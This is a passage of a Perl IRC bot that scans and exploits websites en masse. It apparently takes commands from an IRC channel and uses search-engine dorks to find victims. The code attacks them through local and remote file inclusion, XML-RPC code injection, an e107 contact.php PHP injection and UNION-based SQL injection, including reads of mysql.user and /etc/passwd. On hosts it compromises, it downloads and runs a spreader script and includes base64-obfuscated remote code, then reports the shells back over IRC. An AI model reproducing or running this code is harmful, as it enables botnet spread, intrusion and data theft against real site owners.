  751.                     my $bugx = "/contact.php";
  752.                     my $d0rk = $1;
  753.                     &e107scan($engx,$bugx,$d0rk);
  754.                 }
  755.                 exit;
  756.             }
  757.         }
  758.  
  759.         ##################################################################### Altavista Engine
  760.         if ($msg=~ /PRIVMSG $channel :$e107\s+(.*)/ ) {
  761.             if (my $pid = fork) {
  762.                 waitpid($pid, 0);
  763.             }
  764.             else {
  765.                 if (fork) {    exit; } else {
  766.                     my $engx = "ALtaViSTa";
  767.                     my $bugx = "/contact.php";
  768.                     my $d0rk = $1;
  769.                     &e107scan($engx,$bugx,$d0rk);
  770.                 }
  771.                 exit;
  772.             }
  773.         }
  774.  
  775.         ##################################################################### ASK Engine
  776.         if ($msg=~ /PRIVMSG $channel :$e107\s+(.*)/ ) {
  777.             if (my $pid = fork) {
  778.                 waitpid($pid, 0);
  779.             }
  780.             else {
  781.                 if (fork) {    exit; } else {
  782.                     my $engx = "AsK";
  783.                     my $bugx = "/contact.php";
  784.                     my $d0rk = $1;
  785.                     &e107scan($engx,$bugx,$d0rk);
  786.                 }
  787.                 exit;
  788.             }
  789.         }
  790.  
  791.         ##################################################################### UoL Engine
  792.         if ($msg=~ /PRIVMSG $channel :$e107\s+(.*)/ ) {
  793.             if (my $pid = fork) {
  794.                 waitpid($pid, 0);
  795.             }
  796.             else {
  797.                 if (fork) {    exit; } else {
  798.                     my $engx = "UoL";
  799.                     my $bugx = "/contact.php";
  800.                     my $d0rk = $1;
  801.                     &e107scan($engx,$bugx,$d0rk);
  802.                 }
  803.                 exit;
  804.             }
  805.         }
  806.  
  807.         ##################################################################### Yahoo Engine
  808.         if ($msg=~ /PRIVMSG $channel :$e107\s+(.*)/ ) {
  809.             if (my $pid = fork) {
  810.                 waitpid($pid, 0);
  811.             }
  812.             else {
  813.                 if (fork) {    exit; } else {
  814.                     my $engx = "YahOo";
  815.                     my $bugx = "/contact.php";
  816.                     my $d0rk = $1;
  817.                     &e107scan($engx,$bugx,$d0rk);
  818.                 }
  819.                 exit;
  820.             }
  821.         }
  822.         for(my $c=0; $c<= $#lines; $c++) {
  823.             $line = $lines[$c];
  824.             $line=$line_temp.$line if ($line_temp);
  825.             $line_temp='';
  826.             $line =~ s/\r$//;
  827.             unless ($c == $#lines) {
  828.                 parse("$line");
  829.             } else {
  830.                 if ($#lines == 0) {
  831.                     parse("$line");
  832.                 } elsif ($lines[$c] =~ /\r$/) {
  833.                     parse("$line");
  834.                 } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
  835.                     parse("$line");
  836.                 } else {
  837.                     $line_temp = $line;
  838.                 }
  839.             }
  840.         }
  841.     }
  842. }
  843. ##################################################################### Procedure
  844. sub cmdlfi() {
  845. my $browser = LWP::UserAgent->new;
  846. my $url = $_[0];
  847. my $cmd = $_[1];
  848. my $hie = "j13mbut<?system(\"$cmd 2> /dev/stdout\"); ?>j13mbut";
  849. $browser->agent("$hie");
  850. $browser->timeout(3);
  851. $response = $browser->get( $url );
  852. if ($response->content =~ /j13mbut(.*)j13mbut/s) {
  853. print $1;
  854. sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3LFICMD15)4 $1");
  855. }
  856. }
  857.  
  858. sub lfiscan() {
  859.     my $engz = $_[0];
  860.     my $bugz = $_[1];
  861.     my $dork = $_[2];
  862.     my $contatore = 0;    
  863.     if ($engz =~ /GooGLe/) {
  864.         my @lfigoogle=&google($dork);
  865.         push(@lfitotal, @lfigoogle);
  866.         }
  867.     if ($engz =~ /AllTheWeb/) {
  868.         my @lfialltheweb=&alltheweb($dork);
  869.         push(@lfitotal, @lfialltheweb);
  870.     }
  871.     if ($engz =~ /Bing/) {
  872.         my @lfiBing=&Bing($dork);
  873.         push(@lfitotal, @lfiBing);
  874.     }
  875.     if ($engz =~ /ALtaViSTa/) {
  876.         my @lfialtavista=&altavista($dork);
  877.         push(@lfitotal, @lfialtavista);
  878.     }
  879.     if ($engz =~ /AsK/) {
  880.         my @lfiask=&ask($dork);
  881.         push(@lfitotal, @lfiask);
  882.     }
  883.     if ($engz =~ /UoL/) {
  884.         my @lfiuol=&uol($dork);
  885.         push(@lfitotal, @lfiuol);
  886.     }
  887.     if ($engz =~ /YahOo/) {
  888.         my @lfiyahoo=&yahoo($dork);
  889.         push(@lfitotal, @lfiyahoo);
  890.     }
  891.     my @lficlean = &calculate(@lfitotal);
  892.     if (scalar(@clean) != 0) {
  893.     }
  894.     my $uni=scalar(@lficlean);
  895.     foreach my $lfitarget (@lficlean)
  896.     {
  897.         $contatore++;
  898.         if ($contatore==$uni-1){
  899.             sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3LFI15)(4@3$engz15)10 Scan Finish for14 $dork");
  900.         }
  901.         my $lfi  = "../../../../../../../../../../../../../../..";
  902.         my $xpl  = "http://".$lfitarget.$bugz.$rspo_test;
  903.         my $vuln = "http://".$lfitarget."12".$bugz."7".$rspo_test."";
  904.         my $re   = getcontent($xpl);
  905.         if ($re  =~ /DOCUMENT_ROOT=\// && $re =~ /HTTP_USER_AGENT/){
  906.             if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  907.                 my $rspo = lfiexploit($xpl,"uname -svnrp;echo J13mb0T;id");
  908.                 $rspo =~ s/\n//g;
  909.                 if ($rspo =~ /j13mb0t#(.*)J13mb0Tuid=(.*)#j13mb0t/sg) {
  910.                     my ($sys,$uid) = ($1,$2);
  911.                                         my $lfispread   = "cd /tmp;lwp-download $byroesprd -O php.jpg;perl php.jpg;rm -rf *.jpg*;wget $byroesprd -O php.jpg;perl php.jpg;rm -rf *.jpg*";
  912.                     my $tmp = "/tmp/cmd".int rand(2010);
  913.                     my $upload = lfiexploit($xpl,"wget $rfiid -O $tmp;$lfispread"); sleep(1);
  914.                     my $res = getcontent("http://".$lfitarget.$bugz.$lfi.$tmp.'%00');
  915.                     if ($res =~ /BaMbY/) {
  916.                         sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3LFI15)(4@3$engz15)15(13@12PHPSheLL15)4 http://".$lfitarget."12".$bugz."6".$lfi."7".$tmp."%00 15(7@3".$sys."15)");
  917.                     }
  918.                     else {
  919.                         sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3LFI15)(4@3$engz15)15(13@12System15)4 http://".$lfitarget."12".$bugz."6[LFI] 15(7@3".$sys." 7uid=".$uid."15)");
  920.                     }
  921.                 }
  922.                 else {
  923.                 }
  924.             } exit } sleep(3);
  925.         }
  926.     }
  927. }
  928.  
  929. sub cmdxml() {
  930. my $jed = $_[0];
  931. my $dwa = $_[1];
  932. my $userAgent = LWP::UserAgent->new(agent => 'perl post');
  933.         $exploit = "<?xml version=\"1.0\"?><methodCall>";
  934.         $exploit .= "<methodName>test.method</methodName>";
  935.         $exploit .= "<params><param><value><name>',''));";
  936.         $exploit .= "echo'bamby';echo`".$dwa."`;echo'solo';exit;/*</name></value></param></params></methodCall>";
  937. my $response = $userAgent->request(POST $jed,Content_Type => 'text/xml',Content => $exploit);
  938. if ($response->content =~ /bamby(.*)solo/s) {
  939. sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3XMLCMD15)4 $1");
  940. }
  941. }
  942.  
  943. sub xmlscan() {
  944.     my $engz = $_[0];
  945.     my $bugz = $_[1];
  946.     my $dork = $_[2];
  947.     my $contatore = 0;    
  948.     if ($engz =~ /GooGLe/) {
  949.         my @xmlgoogle=&google($dork);
  950.         push(@xmltotal, @xmlgoogle);
  951.         }
  952.     if ($engz =~ /AllTheWeb/) {
  953.         my @xmlalltheweb=&alltheweb($dork);
  954.         push(@xmltotal, @xmlalltheweb);
  955.     }
  956.     if ($engz =~ /Bing/) {
  957.         my @xmlBing=&Bing($dork);
  958.         push(@xmltotal, @xmlBing);
  959.     }
  960.     if ($engz =~ /ALtaViSTa/) {
  961.         my @xmlaltavista=&altavista($dork);
  962.         push(@xmltotal, @xmlaltavista);
  963.     }
  964.     if ($engz =~ /AsK/) {
  965.         my @xmlask=&ask($dork);
  966.         push(@xmltotal, @xmlask);
  967.     }
  968.     if ($engz =~ /UoL/) {
  969.         my @xmluol=&uol($dork);
  970.         push(@xmltotal, @xmluol);
  971.     }
  972.     if ($engz =~ /YahOo/) {
  973.         my @xmlyahoo=&yahoo($dork);
  974.         push(@xmltotal, @xmlyahoo);
  975.     }
  976.     my @xmlclean = &calculate(@xmltotal);
  977.     if (scalar(@xmlclean) != 0) {
  978.     }
  979.     my $uni=scalar(@xmlclean);
  980.     foreach my $xmltarget (@xmlclean)
  981.     {
  982.         $contatore++;
  983.         if ($contatore==$uni-1){
  984.             sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3XML15)(4@3$engz15)10 Scan Finish for14 $dork");
  985.         }
  986.         my $xpl = "http://".$xmltarget.$bugz;
  987.                 my $xmlsprd = "cd /tmp;lwp-download $byroesprd -O php.jpg;perl php.jpg;rm -rf *.jpg*;wget $byroesprd -O php.jpg;perl php.jpg;rm -rf *.jpg*";
  988.         my $strona = getcontent($xpl);
  989.         if ( $strona =~ /faultCode/ ) {
  990.                         xmlcek($xpl);
  991.                         xmlxspread($xpl,$xmlsprd);
  992.                         }
  993.         }
  994. }
  995.  
  996. sub rfiscan() {
  997.     my $engz = $_[0];
  998.     my $bugz = $_[1];
  999.     my $dork = $_[2];
  1000.     my $contatore = 0;    
  1001.     if ($engz =~ /GooGLe/) {
  1002.         my @rfigoogle=&google($dork);
  1003.         push(@rfitotal, @rfigoogle);
  1004.         }
  1005.     if ($engz =~ /AllTheWeb/) {
  1006.         my @rfialltheweb=&alltheweb($dork);
  1007.         push(@rfitotal, @rfialltheweb);
  1008.     }
  1009.     if ($engz =~ /Bing/) {
  1010.         my @rfiBing=&Bing($dork);
  1011.         push(@rfitotal, @rfiBing);
  1012.     }
  1013.     if ($engz =~ /ALtaViSTa/) {
  1014.         my @rfialtavista=&altavista($dork);
  1015.         push(@rfitotal, @rfialtavista);
  1016.     }
  1017.     if ($engz =~ /AsK/) {
  1018.         my @rfiask=&ask($dork);
  1019.         push(@rfitotal, @rfiask);
  1020.     }
  1021.     if ($engz =~ /UoL/) {
  1022.         my @rfiuol=&uol($dork);
  1023.         push(@rfitotal, @rfiuol);
  1024.     }
  1025.     if ($engz =~ /YahOo/) {
  1026.         my @rfiyahoo=&yahoo($dork);
  1027.         push(@rfitotal, @rfiyahoo);
  1028.     }
  1029.     my @rficlean = &calculate(@rfitotal);
  1030.     if (scalar(@rficlean) != 0) {
  1031.     }
  1032.     my $uni=scalar(@rficlean);
  1033.     foreach my $rfitarget (@rficlean)
  1034.     {
  1035.         $contatore++;
  1036.         if ($contatore==$uni-1){
  1037.             sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3RFI15)(4@3$engz15)10 Scan Finish for14 $dork");
  1038.         }
  1039.         my $rfixpl  = "http://".$rfitarget.$bugz.$rfiid;
  1040.                 my $inj         = "http://".$rfitarget."12".$bugz."7[PHP-SHELL]?";
  1041.         my $re   = getcontent($rfixpl);
  1042.         if ($re  =~ /BaMbY/){
  1043.                         getcontent($rfispd);
  1044.                         os($rfixpl);
  1045.                         sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3RFI15)2$inj14 $os");
  1046.                         }
  1047.         }
  1048. }
  1049. sub sqlscan() {
  1050.     my $engz = $_[0];
  1051.     my $bugz = $_[1];
  1052.     my $dork = $_[2];
  1053.     my $contatore = 0;    
  1054.     if ($engz =~ /GooGLe/) {
  1055.         my @sqlgoogle=&google($dork);
  1056.         push(@sqltotal, @sqlgoogle);
  1057.         }
  1058.     if ($engz =~ /AllTheWeb/) {
  1059.         my @sqlalltheweb=&alltheweb($dork);
  1060.         push(@sqltotal, @sqlalltheweb);
  1061.     }
  1062.     if ($engz =~ /Bing/) {
  1063.         my @sqlBing=&Bing($dork);
  1064.         push(@sqltotal, @sqlBing);
  1065.     }
  1066.     if ($engz =~ /ALtaViSTa/) {
  1067.         my @sqlaltavista=&altavista($dork);
  1068.         push(@sqltotal, @sqlaltavista);
  1069.     }
  1070.     if ($engz =~ /AsK/) {
  1071.         my @sqlask=&ask($dork);
  1072.         push(@sqltotal, @sqlask);
  1073.     }
  1074.     if ($engz =~ /UoL/) {
  1075.         my @sqluol=&uol($dork);
  1076.         push(@sqltotal, @sqluol);
  1077.     }
  1078.     if ($engz =~ /YahOo/) {
  1079.         my @sqlyahoo=&yahoo($dork);
  1080.         push(@sqltotal, @sqlyahoo);
  1081.     }
  1082.     my @sqlclean = &calculate(@sqltotal);
  1083.     if (scalar(@sqlclean) != 0) {
  1084.     }
  1085.     my $uni=scalar(@sqlclean);
  1086.     foreach my $sqltarget (@sqlclean)
  1087.     {
  1088.         $contatore++;
  1089.         if ($contatore==$uni-1){
  1090.         sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3SQL15)(4@3$engz15)10 Scan Finish for14 $dork");
  1091.         }
  1092.         my $xpl = "http://".$sqltarget.$bugz."'";
  1093.                 my $vuln = "http://".$sqltarget."12".$bugz."7[SQL]";
  1094.                 my $sqlsite = "http://".$sqltarget.$bugz;
  1095.         my $strona = getcontent($xpl);
  1096.         if ( $strona =~ m/You have an error in your SQL syntax/i || $strona =~ m/Query failed/i || $strona =~ m/SQL query failed/i )
  1097.                 {sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3SQL15)(2MySQL15)14 $vuln ");&sqlbrute($sqlsite);}
  1098.                 elsif ( $strona =~ m/ODBC SQL Server Driver/i || $strona =~ m/Unclosed quotation mark/i || $strona =~ m/Microsoft OLE DB Provider for/i )
  1099.                 {sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3SQL15)(2MsSQL15)14 $vuln ");}
  1100.                 elsif ( $strona =~ m/Microsoft JET Database/i || $strona =~ m/ODBC Microsoft Access Driver/i )
  1101.                 {sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3SQL15)(2MsAccess15)14 $vuln ");}
  1102.         }
  1103. }
  1104.  
  1105. sub cmde107() {
  1106. my $path = $_[0];
  1107. my $incmd = $_[1];
  1108. my $codecmd = encode_base64($incmd);
  1109. my $cmd = 'echo(base64_decode("QmFNYlk=").shell_exec(base64_decode("aWQ=")).base64_decode("Qnlyb2VOZXQ=")).shell_exec(base64_decode("'.$codecmd.'"))';
  1110. $access = new LWP::UserAgent;
  1111. $access->agent("Mozilla/5.0");
  1112. my $req = new HTTP::Request POST => $path;
  1113.    $req->content_type('application/x-www-form-urlencoded');
  1114.    $req->content("send-contactus=1&author_name=%5Bphp%5D".$cmd."%3Bdie%28%29%3B%5B%2Fphp%5D");
  1115. my $res = $access->request($req);
  1116. my $data = $res->as_string;
  1117. if ( $data =~ /ByroeNet(.*)/ ){
  1118.      $mydata = $1;
  1119. sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3e107CMD15)4 $mydata");
  1120. }
  1121. }
  1122. sub e107scan() {
  1123.     my $engz = $_[0];
  1124.     my $bugz = $_[1];
  1125.     my $dork = $_[2];
  1126.     my $contatore = 0;    
  1127.     if ($engz =~ /GooGLe/) {
  1128.         my @e107google=&google($dork);
  1129.         push(@e107total, @e107google);
  1130.         }
  1131.     if ($engz =~ /AllTheWeb/) {
  1132.         my @e107alltheweb=&alltheweb($dork);
  1133.         push(@e107total, @e107alltheweb);
  1134.     }
  1135.     if ($engz =~ /Bing/) {
  1136.         my @e107Bing=&Bing($dork);
  1137.         push(@e107total, @e107Bing);
  1138.     }
  1139.     if ($engz =~ /ALtaViSTa/) {
  1140.         my @e107altavista=&altavista($dork);
  1141.         push(@e107total, @e107altavista);
  1142.     }
  1143.     if ($engz =~ /AsK/) {
  1144.         my @e107ask=&ask($dork);
  1145.         push(@e107total, @e107ask);
  1146.     }
  1147.     if ($engz =~ /UoL/) {
  1148.         my @e107uol=&uol($dork);
  1149.         push(@e107total, @e107uol);
  1150.     }
  1151.     if ($engz =~ /YahOo/) {
  1152.         my @e107yahoo=&yahoo($dork);
  1153.         push(@e107total, @e107yahoo);
  1154.     }
  1155.     my @e107clean = &calculate(@e107total);
  1156.     if (scalar(@e107clean) != 0) {
  1157.     }
  1158.     my $uni=scalar(@e107clean);
  1159.     foreach my $e107target (@e107clean)
  1160.     {
  1161.         $contatore++;
  1162.         if ($contatore==$uni-1){
  1163.             sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3e10715)(4@3$engz15)10 Scan Finish for14 $dork");
  1164.         }
  1165.                 my $cmd = "echo(base64_decode(\"Vm9v\").php_uname().base64_decode(\"RG9v\"));include(base64_decode(\"aHR0cDovL2NnbXVzY2xlLmNvbS8vL3JvYm90cy50eHQ=\"));include(base64_decode(\"aHR0cDovL2NnbXVzY2xlLmNvbS8vL3JvYm90cy50eHQ=\"));";
  1166.                 my $ua = LWP::UserAgent->new or die;
  1167.                 $ua->agent('Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)');
  1168.                 $ua->timeout(15);
  1169.                 my $xpl = "http://".$e107target."/contact.php";
  1170.                 $xpl =~ s/\/\/contact.php/\/contact.php/g;
  1171.                 my $req = HTTP::Request->new(POST => $xpl);
  1172.                 $req->content_type('application/x-www-form-urlencoded');
  1173.                 $req->content("send-contactus=1&author_name=%5Bphp%5D".$cmd."%3Bdie%28%29%3B%5B%2Fphp%5D");
  1174.                 my $res = $ua->request($req);
  1175.                 my $cont = $res->content;
  1176.                         if ($cont =~ /Voo(.*)Doo/) {
  1177.                                 my $uname = $1;
  1178.                                 $uname=~s/\n//;
  1179.                                 $uname=~s/\r//;
  1180.                                 sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3e10715)(2$xpl15)14 $uname ");
  1181.                         }
  1182.         }
  1183. }
  1184. sub enc()
  1185. {
  1186.    my $md5_hash = $1;
  1187.    my $md5_generated = md5_hex($md5_hash);
  1188.    sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3md5 Encode15)2 $md5_generated");
  1189. }
  1190. sub dec()
  1191. {
  1192.    my $md5 = $1;
  1193.    my $crac = 'http://md5.noisette.ch/md5.php?hash='.$md5;
  1194.    my $found = getcontent($crac);
  1195.       if        ($found =~ /<string><!\[CDATA\[(.*)\]\]><\/string>/)
  1196.                         {
  1197.                         sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3md5 Decode15)2 $1");
  1198.                         }
  1199.       else
  1200.                         {
  1201.                         sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3md5 Decode15)2 $1");
  1202.                         }
  1203. }
  1204. sub xmlcek {
  1205. my $xmltgt = $_[0];
  1206. my $userAgent = LWP::UserAgent->new(agent => 'perl post');
  1207.         $exploit = "<?xml version=\"1.0\"?><methodCall>";
  1208.         $exploit .= "<methodName>test.method</methodName>";
  1209.         $exploit .= "<params><param><value><name>',''));";
  1210.         $exploit .= "echo'j13mb0t';echo`uname -a`;echo'j13mb0t';exit;/*</name></value></param></params></methodCall>";
  1211. my $response = $userAgent->request(POST $xmltgt, Content_Type => 'text/xml', Content => $exploit);
  1212. if ($response->content =~ /j13mb0t(.*)j13mb0t/s) {
  1213. $os=$1;
  1214. sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3XML15)(2$xmltgt15)14 $os ");
  1215. sendraw($IRC_cur_socket, "PRIVMSG BaMbY :15(4@3XML15)(2$xmltgt15)14 $os ");
  1216. }}
  1217. sub xmlxspread() {
  1218. my $xmltargt = $_[0];
  1219. my $xmlsprd = $_[1];
  1220. my $userAgent = LWP::UserAgent->new(agent => 'perl post');
  1221.         $exploit = "<?xml version=\"1.0\"?><methodCall>";
  1222.         $exploit .= "<methodName>test.method</methodName>";
  1223.         $exploit .= "<params><param><value><name>',''));";
  1224.         $exploit .= "echo'j13m';echo`".$xmlsprd."`;echo'b0T';exit;/*</name></value></param></params></methodCall>";
  1225. my $response = $userAgent->request(POST $xmltargt, Content_Type => 'text/xml', Content => $exploit);
  1226. }
  1227.  
  1228. sub getcontent() {
  1229.     my $url = $_[0];
  1230.     my $req = HTTP::Request->new(GET => $url);
  1231.     my $ua  = LWP::UserAgent->new();
  1232.     $ua->timeout(15);
  1233.     my $response = $ua->request($req);
  1234.     return $response->content;
  1235. }
  1236.  
  1237. sub lfiexploit() {
  1238.     my $url = $_[0];
  1239.     my $rce = $_[1];
  1240.     my $agent = "<?php echo \"j13mb0t#\"; passthru(\'".$rce."\'); echo \"#j13mb0t\"; ?>";
  1241.     my $ua = LWP::UserAgent->new(agent => $agent);
  1242.     $ua->timeout(15);
  1243.     my $req = HTTP::Request->new(GET => $url);
  1244.     my $response = $ua->request($req);
  1245.     return $response->content;
  1246. }
  1247.  
  1248. sub google(){
  1249.     my @lst;
  1250.     my $key = $_[0];
  1251.     my $b   = 0;
  1252.     for ($b=0; $b<=1000; $b+=100){
  1253.         my $Go=("http://www.google.com/search?q=".key($key)."&num=100&filter=0&start=".$b);
  1254.         my $Res=query($Go);
  1255.         while ($Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g){
  1256.             if ($1 !~ /google/){
  1257.                 my $k=$1;
  1258.                 my @grep=links($k);
  1259.                 push(@lst,@grep);
  1260.             }
  1261.         }
  1262.     }
  1263. return @lst;
  1264. }
  1265. sub SIGN() {
  1266. if (($powered !~ /B/)||($mail !~ /oe/)) {
  1267. print "\nLamer!!! Bodoh ToloL Oon !!! Udah Gak Usah diRubah Lagi!!!\n\n";
  1268. exec("rm -rf $0 && pkill perl");
  1269. }
  1270. }
  1271. sub alltheweb() {
  1272.     my @lst;
  1273.     my $key = $_[0];
  1274.     my $b   = 0;
  1275.     my $pg  = 0;
  1276.     for ($b=0; $b<=1000; $b+=100) {
  1277.         my $all = ("http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=100&q=".key($key)."&o=".$b);
  1278.         my $Res = query($all);
  1279.         while ( $Res =~ m/<span class=\"?resURL\"?>http:\/\/(.+?)\<\/span>/g ) {
  1280.             my $k = $1;
  1281.             $k =~ s/ //g;
  1282.             my @grep = links($k);
  1283.             push( @lst, @grep );
  1284.         }
  1285.     }
  1286.     return @lst;
  1287. }
  1288.  
  1289. sub uol() {
  1290.     my @lst;
  1291.     my $key = $_[0];
  1292.     my $b   = 0;
  1293.     for ($b=1; $b<=1000; $b+=10) {
  1294.         my $UoL = ("http://mundo.busca.uol.com.br/buscar.html?q=".key($key)."&start=".$b);
  1295.         my $Res = query($UoL);
  1296.         while ( $Res =~ m/<a href=\"http:\/\/([^>\"]*)/g ) {
  1297.             my $k = $1;
  1298.             if ( $k !~ /busca|uol|yahoo/ ) {
  1299.                 my $k    = $1;
  1300.                 my @grep = links($k);
  1301.                 push( @lst, @grep );
  1302.             }
  1303.         }
  1304.     }
  1305.     return @lst;
  1306. }
  1307.  
  1308. sub Bing() {
  1309.     my @lst;
  1310.     my $key = $_[0];
  1311.     my $b   = 0;
  1312.     for ($b=1; $b<=1000; $b+=10) {
  1313.         my $bing = ("http://www.bing.com/search?q=".key($key)."&filt=all&first=".$b."&FORM=PERE");
  1314.         my $Res = query($bing);
  1315.         while ( $Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g ) {
  1316.             if ( $1 !~ /msn|live|bing/ ) {
  1317.                 my $k    = $1;
  1318.                 my @grep = links($k);
  1319.                 push( @lst, @grep );
  1320.             }
  1321.         }
  1322.     }
  1323.     return @lst;
  1324. }
  1325.  
  1326. sub altavista(){
  1327.     my @lst;
  1328.     my $key = $_[0];
  1329.     my $b   = 0;
  1330.     for ($b=1; $b<=1000; $b+=10){
  1331.         my $AlT=("http://it.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=".key($key)."&stq=".$b);
  1332.         my $Res=query($AlT);
  1333.         while ($Res=~m/<span class=ngrn>(.+?)\//g){
  1334.             if ($1 !~ /altavista/){
  1335.                 my $k=$1;
  1336.                 $k=~s/<//g;
  1337.                 $k=~s/ //g;
  1338.                 my @grep=links($k);
  1339.                 push(@lst,@grep);
  1340.             }
  1341.         }
  1342.     }
  1343. return @lst;
  1344. }
  1345.  
  1346. sub ask() {
  1347.     my @lst;
  1348.     my $key = $_[0];
  1349.     my $b   = 0;
  1350.     my $pg  = 0;
  1351.     for ($b=0; $b<=1000; $b+=10) {
  1352.         my $Ask = ("http://it.ask.com/web?q=".key($key)."&o=0&l=dir&qsrc=0&qid=EE90DE6E8F5370F363A63EC61228D4FE&dm=all&page=".$b);
  1353.         my $Res = query($Ask);
  1354.         while ($Res =~ m/href=\"http:\/\/(.+?)\" onmousedown=/g) {
  1355.             if ($1 !~ /ask.com/){
  1356.                 my $k = $1;
  1357.                 my @grep = links($k);
  1358.                 push( @lst, @grep );
  1359.             }
  1360.         }
  1361.     }
  1362.     return @lst;
  1363. }
  1364.  
  1365. sub yahoo() {
  1366.     my @lst;
  1367.     my $key = $_[0];
  1368.     my $b   = 0;
  1369.     for ($b=1; $b<=500; $b+=1) {
  1370.         my $yahoo = ("http://www.search.yahoo.com/search?p=".key($key)."&ei=UTF-8&fr=yfp-t-501&fp_ip=IT&pstart=1&b=".$b);
  1371.         my $Res = query($yahoo);
  1372.         while ($Res =~ m/26u=(.*?)%26w=/g) {
  1373.             if ($1 !~ /yahoo/){
  1374.                 my $k = $1;
  1375.                 my @grep = links($k);
  1376.                 push(@lst, @grep);
  1377.             }
  1378.         }
  1379.     }
  1380.     return @lst;
  1381. }
  1382. sub os() {
  1383.     my $target=$_[0];
  1384.     my $re  = &query($target);
  1385.     while ($re =~ m/<br>OSTYPE:(.+?)\<br>/g) {
  1386.         $os = $1;
  1387.     }
  1388. }
  1389.  
  1390. sub query($) {
  1391. my $url = $_[0];
  1392. $url =~ s/http:\/\///;
  1393. my $host  = $url;
  1394. my $query = $url;
  1395. my $page  = "";
  1396. $host  =~ s/href=\"?http:\/\///;
  1397. $host  =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
  1398. $query =~ s/$host//;
  1399. if ( $query eq "" ) { $query = "/"; }
  1400. eval {
  1401. my $sock = IO::Socket::INET->new(PeerAddr => "$host", PeerPort => "80", Proto => "tcp") or return;
  1402. print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
  1403. my @r = <$sock>;
  1404. $page = "@r";
  1405. close($sock);
  1406. };
  1407. return $page;
  1408. }
  1409. sub links() {
  1410.     my @l;
  1411.     my $link = $_[0];
  1412.     my $host = $_[0];
  1413.     my $hdir = $_[0];
  1414.     $hdir =~ s/(.*)\/[^\/]*$/\1/;
  1415.     $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
  1416.     $host .= "/";
  1417.     $link .= "/";
  1418.     $hdir .= "/";
  1419.     $host =~ s/\/\//\//g;
  1420.     $hdir =~ s/\/\//\//g;
  1421.     $link =~ s/\/\//\//g;
  1422.     push( @l, $link, $host, $hdir );
  1423.     return @l;
  1424. }
  1425. sub key() {
  1426.     my $dork = $_[0];
  1427.     $dork =~ s/ /\+/g;
  1428.     $dork =~ s/:/\%3A/g;
  1429.     $dork =~ s/\//\%2F/g;
  1430.     $dork =~ s/&/\%26/g;
  1431.     $dork =~ s/\"/\%22/g;
  1432.     $dork =~ s/,/\%2C/g;
  1433.     $dork =~ s/\\/\%5C/g;
  1434.     return $dork;
  1435. }
  1436.  
  1437.  
  1438. sub calculate {
  1439.     my @calculate = ();
  1440.     my %visti = ();
  1441.     foreach my $element (@_) {
  1442.         $element =~ s/\/+/\//g;
  1443.         next if $visti{$element}++;
  1444.         push @calculate, $element;
  1445.     }
  1446.     return @calculate;
  1447. }
  1448. sub sqlbrute() {
  1449.                         my $site=$_[0];
  1450.                         my $columns=20;
  1451. my $cfin.="--";
  1452. my $cmn.= "+";
  1453. for ($column = 0 ; $column < $columns ; $column ++)
  1454.         {
  1455.         $union.=','.$column;
  1456.         $inyection.=','."0x6c6f67696e70776e7a";
  1457.     if ($column == 0)
  1458.       {
  1459.                   $inyection = '';
  1460.           $union = '';
  1461.       }
  1462.     $sql=$site."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cfin;
  1463.     $response=get($sql);
  1464.     if($response =~ /loginpwnz/)
  1465.                 {
  1466.          $column ++;
  1467.          $sql=$site."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cfin;
  1468.                  sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3SQL15)14 $sql ");
  1469.          $sql=$site."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn."information_schema.tables".$cfin;
  1470.          $response=get($sql)or die("[-] Impossible to get Information_Schema\n");
  1471.          if($response =~ /loginpwnz/)
  1472.                 {
  1473.                 $sql=$site."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."information_schema.tables".$cfin;
  1474.                         sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3SQL15)(2SCHEMA15)14 $sql ");
  1475.                 }
  1476.          $sql=$site."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn."mysql.user".$cfin;
  1477.          $response=get($sql)or die("[-] Impossible to get MySQL.User\n");
  1478.          if($response =~ /loginpwnz/)
  1479.                 {
  1480.                 $sql=$site."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."mysql.user".$cfin;
  1481.                         sendraw($IRC_cur_socket, "PRIVMSG $channel :15(4@3SQL15)(2USER15)14 $sql ");
  1482.                 }
  1483.          else
  1484.                 {
  1485.                 }
  1486.         while ($loadcont < $column-1)
  1487.            {
  1488.                 $loadfile.=','.'load_file(0x2f6574632f706173737764)';
  1489.                 $loadcont++;
  1490.            }
